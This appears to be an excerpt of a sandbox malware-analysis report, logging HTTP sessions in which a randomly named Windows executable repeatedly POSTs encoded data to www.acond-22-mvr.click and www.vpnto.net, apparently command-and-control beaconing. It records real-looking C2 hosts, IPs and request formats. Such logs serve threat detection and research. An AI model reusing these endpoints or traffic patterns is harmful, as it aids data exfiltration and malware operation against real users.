                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.acond-22-mvr.click
                                                                    Origin: http://www.acond-22-mvr.click
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.acond-22-mvr.click/9qaj/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 52 59 74 59 48 72 32 52 44 78 67 32 74 7a 57 6b 53 6b 75 74 4e 55 6a 59 6b 36 75 53 61 73 48 6f 51 49 52 6b 74 78 72 38 59 59 48 41 31 79 35 39 72 4c 69 70 2f 35 41 4c 6f 64 51 4b 4b 4c 50 30 6c 69 2b 76 73 37 2f 43 31 4e 6a 73 39 6c 6d 58 4a 69 48 47 77 75 67 53 31 76 62 48 31 6d 73 58 4c 30 79 57 56 46 6b 77 58 6d 6d 2f 32 6c 66 6d 6b 34 42 32 61 6a 37 6b 71 74 4d 32 53 71 6e 32 6a 49 78 6b 43 6a 41 62 63 6f 7a 35 4a 37 62 71 47 4e 2f 61 6f 4f 2b 67 55 64 69 4e 73 35 43 74 52 55 72 78 67 45 32 34 78 65 30 43 71 6b 36 59 75 68 35 62 66 2f 67 6a 38 45 64 76 36 33 38 6a 6d 50 56 53 46 52 49 3d
                                                                    Data Ascii: dpy4vDKP=RYtYHr2RDxg2tzWkSkutNUjYk6uSasHoQIRktxr8YYHA1y59rLip/5ALodQKKLP0li+vs7/C1Njs9lmXJiHGwugS1vbH1msXL0yWVFkwXmm/2lfmk4B2aj7kqtM2Sqn2jIxkCjAbcoz5J7bqGN/aoO+gUdiNs5CtRUrxgE24xe0Cqk6Yuh5bf/gj8Edv638jmPVSFRI=
                                                                    Dec 5, 2024 09:45:30.910343885 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    date: Thu, 05 Dec 2024 08:45:30 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1138
                                                                    x-request-id: ee200165-15c0-4ea5-9132-e5829c91bac1
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IW9WvAB1qfFDPre95lKUHpblrUqctL2bDiYmlMm6sfikY2QV8UJvEPi3D3VXyUN0Khk6g1Yd3zf+zCJ68RDHOw==
                                                                    set-cookie: parking_session=ee200165-15c0-4ea5-9132-e5829c91bac1; expires=Thu, 05 Dec 2024 09:00:30 GMT; path=/
                                                                    connection: close
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 49 57 39 57 76 41 42 31 71 66 46 44 50 72 65 39 35 6c 4b 55 48 70 62 6c 72 55 71 63 74 4c 32 62 44 69 59 6d 6c 4d 6d 36 73 66 69 6b 59 32 51 56 38 55 4a 76 45 50 69 33 44 33 56 58 79 55 4e 30 4b 68 6b 36 67 31 59 64 33 7a 66 2b 7a 43 4a 36 38 52 44 48 4f 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IW9WvAB1qfFDPre95lKUHpblrUqctL2bDiYmlMm6sfikY2QV8UJvEPi3D3VXyUN0Khk6g1Yd3zf+zCJ68RDHOw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                    Dec 5, 2024 09:45:30.910367012 CET | 591 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZWUyMDAxNjUtMTVjMC00ZWE1LTkxMzItZTU4MjljOTFiYWMxIiwicGFnZV90aW1lIjoxNzMzMzg4Mz


                                                                    Session ID: 30 | Source IP: 192.168.2.8 | Source Port: 49739 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 5952 | Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:45:32.496433020 CET | 815 | OUT | POST /9qaj/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.acond-22-mvr.click
                                                                    Origin: http://www.acond-22-mvr.click
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.acond-22-mvr.click/9qaj/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 52 59 74 59 48 72 32 52 44 78 67 32 75 54 47 6b 51 44 43 74 49 30 6a 62 68 36 75 53 54 4d 48 73 51 49 56 6b 74 30 54 57 59 71 54 41 73 53 4a 39 71 4a 61 70 2b 35 41 4c 6e 39 51 31 4f 4c 50 76 6c 69 79 4e 73 2b 2f 43 31 4a 44 73 39 6c 57 58 4a 7a 48 48 78 2b 67 55 67 66 62 4a 36 47 73 58 4c 30 79 57 56 46 5a 6e 58 67 4f 2f 32 30 76 6d 72 35 42 78 53 44 37 6e 38 39 4d 32 44 36 6e 49 6a 49 77 4c 43 69 63 39 63 73 44 35 4a 37 72 71 49 38 2f 5a 2f 65 2f 72 51 64 6a 46 2f 36 6a 31 52 6d 58 6b 6b 58 53 66 2f 50 59 42 76 53 4c 79 30 44 78 64 63 2f 49 49 38 48 31 5a 2f 41 68 4c 38 73 46 69 62 47 65 77 43 75 52 46 39 31 6a 47 68 4b 36 69 50 38 53 33 2b 50 64 66
                                                                    Data Ascii: dpy4vDKP=RYtYHr2RDxg2uTGkQDCtI0jbh6uSTMHsQIVkt0TWYqTAsSJ9qJap+5ALn9Q1OLPvliyNs+/C1JDs9lWXJzHHx+gUgfbJ6GsXL0yWVFZnXgO/20vmr5BxSD7n89M2D6nIjIwLCic9csD5J7rqI8/Z/e/rQdjF/6j1RmXkkXSf/PYBvSLy0Dxdc/II8H1Z/AhL8sFibGewCuRF91jGhK6iP8S3+Pdf
                                                                    Dec 5, 2024 09:45:33.572592974 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    date: Thu, 05 Dec 2024 08:45:33 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1138
                                                                    x-request-id: c6bd7d92-3e31-42f7-8388-b1e8c8d2c578
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IW9WvAB1qfFDPre95lKUHpblrUqctL2bDiYmlMm6sfikY2QV8UJvEPi3D3VXyUN0Khk6g1Yd3zf+zCJ68RDHOw==
                                                                    set-cookie: parking_session=c6bd7d92-3e31-42f7-8388-b1e8c8d2c578; expires=Thu, 05 Dec 2024 09:00:33 GMT; path=/
                                                                    connection: close
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 49 57 39 57 76 41 42 31 71 66 46 44 50 72 65 39 35 6c 4b 55 48 70 62 6c 72 55 71 63 74 4c 32 62 44 69 59 6d 6c 4d 6d 36 73 66 69 6b 59 32 51 56 38 55 4a 76 45 50 69 33 44 33 56 58 79 55 4e 30 4b 68 6b 36 67 31 59 64 33 7a 66 2b 7a 43 4a 36 38 52 44 48 4f 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IW9WvAB1qfFDPre95lKUHpblrUqctL2bDiYmlMm6sfikY2QV8UJvEPi3D3VXyUN0Khk6g1Yd3zf+zCJ68RDHOw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                    Dec 5, 2024 09:45:33.572798014 CET | 591 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzZiZDdkOTItM2UzMS00MmY3LTgzODgtYjFlOGM4ZDJjNTc4IiwicGFnZV90aW1lIjoxNzMzMzg4Mz


                                                                    Session ID: 31 | Source IP: 192.168.2.8 | Source Port: 49740 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 5952 | Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:45:35.166600943 CET | 1832 | OUT | POST /9qaj/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.acond-22-mvr.click
                                                                    Origin: http://www.acond-22-mvr.click
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.acond-22-mvr.click/9qaj/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Ascii: dpy4vDKP= [TRUNCATED]
                                                                    Dec 5, 2024 09:45:36.342675924 CET    1236                IN          HTTP/1.1 200 OK
                                                                    date: Thu, 05 Dec 2024 08:45:35 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1138
                                                                    x-request-id: 665c7459-ef71-4203-bb9f-1b49f67554a4
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IW9WvAB1qfFDPre95lKUHpblrUqctL2bDiYmlMm6sfikY2QV8UJvEPi3D3VXyUN0Khk6g1Yd3zf+zCJ68RDHOw==
                                                                    set-cookie: parking_session=665c7459-ef71-4203-bb9f-1b49f67554a4; expires=Thu, 05 Dec 2024 09:00:36 GMT; path=/
                                                                    connection: close
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IW9WvAB1qfFDPre95lKUHpblrUqctL2bDiYmlMm6sfikY2QV8UJvEPi3D3VXyUN0Khk6g1Yd3zf+zCJ68RDHOw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                    Dec 5, 2024 09:45:36.342767000 CET    591                 IN          Data Raw: [hex dump omitted]
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjY1Yzc0NTktZWY3MS00MjAzLWJiOWYtMWI0OWY2NzU1NGE0IiwicGFnZV90aW1lIjoxNzMzMzg4Mz


                                                                    Session ID   Source IP     Source Port   Destination IP    Destination Port   PID    Process
                                                                    32           192.168.2.8   49741         199.59.243.227    80                 5952   C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp                             Bytes transferred   Direction   Data
                                                                    Dec 5, 2024 09:45:37.834777117 CET    523                 OUT         GET /9qaj/?t8=erepa0aHg&dpy4vDKP=caF4EcuODBgQ1i6gPG20EU6tn7+OYu3Aff5fuR7QYIa9oDxgmbqLqfUGksVeBOzK8iLLl5bd6dj0pUPLQhqCx4w42vP06UsMAFCvdgslU2ProEjwrqN2bmfrxuo1f5qv1g== HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.acond-22-mvr.click
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:45:38.915838957 CET    1236                IN          HTTP/1.1 200 OK
                                                                    date: Thu, 05 Dec 2024 08:45:38 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1506
                                                                    x-request-id: a5e56f20-c01e-49e5-9df2-e526898dbcb1
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_KTbAYdnavz/s7jIiqmR6Mit0yOmzec7JiCiBl2Y20ED5QwC1kyrWrUwayPw9RN+ia9XmS19RRbcQ5mzVEnoqzw==
                                                                    set-cookie: parking_session=a5e56f20-c01e-49e5-9df2-e526898dbcb1; expires=Thu, 05 Dec 2024 09:00:38 GMT; path=/
                                                                    connection: close
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_KTbAYdnavz/s7jIiqmR6Mit0yOmzec7JiCiBl2Y20ED5QwC1kyrWrUwayPw9RN+ia9XmS19RRbcQ5mzVEnoqzw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                    Dec 5, 2024 09:45:38.915883064 CET    959                 IN          Data Raw: [hex dump omitted]
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTVlNTZmMjAtYzAxZS00OWU1LTlkZjItZTUyNjg5OGRiY2IxIiwicGFnZV90aW1lIjoxNzMzMzg4Mz


                                                                    Session ID   Source IP     Source Port   Destination IP    Destination Port   PID    Process
                                                                    33           192.168.2.8   49742         91.226.30.3       80                 5952   C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp                             Bytes transferred   Direction   Data
                                                                    Dec 5, 2024 09:45:44.656790972 CET    768                 OUT         POST /v3s3/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.vpnto.net
                                                                    Origin: http://www.vpnto.net
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.vpnto.net/v3s3/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Ascii: dpy4vDKP=gwPdUvIurC4xWv8rTDHqWbF7ddCtKQS+rXWGyia89Kyche8bysygKjoKg6L4qPWJqYaVZLHEXRDjnaAIjdyHlaKKzajVGOTdeu8KRU1tW+CNGnWIFj8qVLGXTwrUb8d66EaVMn8KzfahvDz0BGI2ETTwSsQXBd6FTi1iPOUeivU0EFgovcIZJp0UcHGoh0wKJnYsVXg=
                                                                    Dec 5, 2024 09:45:45.975054979 CET    1236                IN          HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:45:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip
                                                                    Data Ascii: c32Y[oF~"k&,\d\- X"r4-$EaM}X`j_@,.a7m3s|;K7..~v2kV0/KOW->ncqfvJi'I)2Xm:Y[nP#877'iJ-mT4j,}"6Mm^j@c+Z.G[4Q?~?z4Oh/^XK154kzN*ReBtx(4CnX/`SrE(/,vq.1*Zx<*+!^VXSF;VOC'lq<plweC\UT>Q(L+5-0fYP-t6eSzBsY5|uU/Sz4yE33JTPcQlkNrlrQ_C`@0-!_W)?geV3IG^->s7xxkSwfN@L|iVbwL{67~x=iF,X*?kaAm,p@]Pjmi~@QL=~?Su}Ss+d7]Hyc}y[p$&T/xmf+XZoguKzSJV|]/yji7>8DRU8dYV7Q[@lLD%@Pcrcz{[j:LL0)G9]Li`5<6R [TRUNCATED]
                                                                    Dec 5, 2024 09:45:45.975104094 CET    1236                IN          Data Raw: [hex dump omitted]
                                                                    Data Ascii: !UP)I!2){MyA8n4U)6YmmNz%zZ7Km'[At1frU.2[#0C^t[~ q|n"*K,({u4nVSfi3XC5=@zRE{KQBj*K+MU
                                                                    Dec 5, 2024 09:45:45.975141048 CET    844                 IN          Data Raw: [hex dump omitted]
                                                                    Data Ascii: <BR'')Ldlz"-Z5&|6N,.bqN'y-4[1Acw0NxEEKa]H<9PzL6+ZA]<,#;CyM-*TuYp15Idrh^du.}l2hJ~ ,0*HI'&&$l`sBU42


                                                                    Session ID   Source IP     Source Port   Destination IP    Destination Port   PID    Process
                                                                    34           192.168.2.8   49743         91.226.30.3       80                 5952   C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp                             Bytes transferred   Direction   Data
                                                                    Dec 5, 2024 09:45:47.323132992 CET    788                 OUT         POST /v3s3/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.vpnto.net
                                                                    Origin: http://www.vpnto.net
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.vpnto.net/v3s3/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Ascii: dpy4vDKP=gwPdUvIurC4xQ8krVkTqBrF4S9CtDwS6rXaGyjf795ach7YbztygZToKoaKT3fWOqYW3ZPHEXQjjnfEI/76EkKKI86izCOTdeu8KRUhDW/qNGXGIEHo1WLGQWwrUJMdm6EbwMmRlzdihvGP0CUwxRDT2McRyId/vUCQHFPAmn9QwBzRC1+AfKpc/cEuekDtiTEIcLA2zvCKK4FiuyGrN/jKFksAT
                                                                    Dec 5, 2024 09:45:48.700352907 CET    1236                IN          HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:45:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip
                                                                    Data Ascii: c32Y[oF~"k&,\d\- X"r4-$EaM}X`j_@,.a7m3s|;K7..~v2kV0/KOW->ncqfvJi'I)2Xm:Y[nP#877'iJ-mT4j,}"6Mm^j@c+Z.G[4Q?~?z4Oh/^XK154kzN*ReBtx(4CnX/`SrE(/,vq.1*Zx<*+!^VXSF;VOC'lq<plweC\UT>Q(L+5-0fYP-t6eSzBsY5|uU/Sz4yE33JTPcQlkNrlrQ_C`@0-!_W)?geV3IG^->s7xxkSwfN@L|iVbwL{67~x=iF,X*?kaAm,p@]Pjmi~@QL=~?Su}Ss+d7]Hyc}y[p$&T/xmf+XZoguKzSJV|]/yji7>8DRU8dYV7Q[@lLD%@Pcrcz{[j:LL0)G9]Li`5<6R [TRUNCATED]
                                                                    Dec 5, 2024 09:45:48.700423956 CET    1236                IN          Data Raw: [hex dump omitted]
                                                                    Data Ascii: !UP)I!2){MyA8n4U)6YmmNz%zZ7Km'[At1frU.2[#0C^t[~ q|n"*K,({u4nVSfi3XC5=@zRE{KQBj*K+MU
                                                                    Dec 5, 2024 09:45:48.700437069 CET    844                 IN          Data Raw: [hex dump omitted]
                                                                    Data Ascii: <BR'')Ldlz"-Z5&|6N,.bqN'y-4[1Acw0NxEEKa]H<9PzL6+ZA]<,#;CyM-*TuYp15Idrh^du.}l2hJ~ ,0*HI'&&$l`sBU42


                                                                    Session ID   Source IP     Source Port   Destination IP    Destination Port   PID    Process
                                                                    35           192.168.2.8   49744         91.226.30.3       80                 5952   C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp                             Bytes transferred   Direction   Data
                                                                    Dec 5, 2024 09:45:49.991933107 CET    1805                OUT         POST /v3s3/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.vpnto.net
                                                                    Origin: http://www.vpnto.net
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.vpnto.net/v3s3/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
